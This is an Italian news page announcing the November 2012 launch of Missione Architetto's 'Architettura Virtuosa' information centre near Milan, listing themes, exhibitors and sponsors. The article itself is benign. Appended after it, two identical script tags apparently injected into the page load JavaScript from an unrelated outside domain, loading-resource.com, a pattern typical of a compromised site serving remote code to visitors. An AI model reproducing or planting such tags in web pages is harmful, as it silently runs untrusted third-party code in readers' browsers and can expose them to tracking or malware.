1. Home
  2. Notizie e Mercato
  3. Presentazione dello Spazio Missione Architetto, il primo Polo informativo e divulgativo dell'Architettura Virtuosa

Presentazione dello Spazio Missione Architetto, il primo Polo informativo e divulgativo dell'Architettura Virtuosa

Professione di
Presentazione dello Spazio Missione Architetto, il primo Polo informativo e divulgativo dell'Architettura Virtuosa
5/5
votato da 1 persone
Missione Architetto, associazione no profit di professionisti della pr


Attraverso un'azione congiunta e coordinata si è definito un modello operativo che coinvolge progettisti e aziende e che si propone di far invertire la marcia insensata nel settore edile verso la perdita di fiducia e di motivazione generata dalla crisi che stiamo vivendo.

L'8 di Novembre 2012 presso la nuova sede di Via F.lli Cervi 7, a Trezzano sul Naviglio, in prossimità della S.S. Nuova Vigevanese e all'uscita 5 della Tangenziale Ovest, in una zona con ampi parcheggi e facili accessi, verrà presentato alle ore 17.00 a media, aziende e professionisti il Polo informativo e divulgativo dell'Architettura Virtuosa.

Nel corso del 2013 saranno lanciate una serie di iniziative, mostre, convegni ed eventi che vogliono chiarire al pubblico degli utenti finali l'importanza di richiedere, comprare, vivere in architetture di qualità: rispettose dell'ambiente e delle persone, belle perchè costruite con arte & design, salubri ed emozionanti, personalizzate e realizzate con manufatti e tramite aziende rispettose della vita che verrà vissuta intorno e dentro di loro.

Verranno coinvolti progettisti che si identificano in questo modello e che ritengono ci sia modo in Italia di tutelare, migliorare e condividere la passione per il nostro Paese, la nostra arte e la qualità del nostro paesaggio nell'ottica di proporre al Mondo, in maniera sempre più importante, un modello italiano di stile di vita qualitativa fatta di bellezza e di cultura.

Uno spazio dove confluiranno iniziative di coinvolgimento e si organizzeranno attività di formazione sia rivolte ai professionisti che al mondo delle costruzioni edili (installatori, operatori, tecnici).

Un luogo di incontro e crescita culturale per architetti, ingegneri, geometri che si ritroveranno uniti nella visione di un'architettura virtuosa cioè capace di generare benessere e vitalità.

L'edificio verrà allestito e rimarrà visitabile per un mese con lo scopo di condividere un percorso con coloro che sentono la necessità di un rinnovamento radicale della modalità di fare architettura in questo Paese, soffocato dalla burocrazia, dalla incuranza, dalla poca volontà di rimboccarsi un po' tutti le maniche per ricostruirne i connotati splendidi che, sotto una polvere di ottusità, si nascondono.

Le tematiche strettamente legate all'architettura virtuosa che verranno affrontate l'8 di novembre nelle installazioni presenti sono quelle che verranno toccate mensilmente e singolarmente nel corso del 2013 ossia:

Ecosostenibilità, Domotica, Benessere, Risparmio, Personalità, Emozionalità, Arte & Design, Luce e colore.
Artisti, architetti, progettisiti, tecnici e comunicatori si uniranno per raccontare questa visione, la mission possible di Missioen Architetto: unire la cultura e la sensibilità progettuale.

Installazioni d'architettura di:
Fabio Vicamini (Presidente di Missione Architetto), Daniele Rotondo, Romolo Pugliese, Walter Zaninelli, Grazia Perazzo.

Opere d'arte di:
Giovanna La Falce, Ico Gasparri, Ruggero Gabbai, Stefano Marangon (il Pittore del Sole), Gaetano Fracassio e due installazioni del maestro Medhat Shafik.

Durante l'evento verrà proposta la Bio-degustazione che accompagnerà tutte le iniziative che verranno organizzate durante il 2013: Parla come mangi...mangia come parli.
Prodotti Biologici dell'azienda A Modo Bio.

Si ringraziano le seguenti aziende per i contributi:
Faraone (main sponsor), Deascreen, Novamont, Villes 2000

Si ringraziano le seguenti aziende per il supporto tecnico:
Progetto Legno, Mariflor, Interior Decor, A Modo Bio.


<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>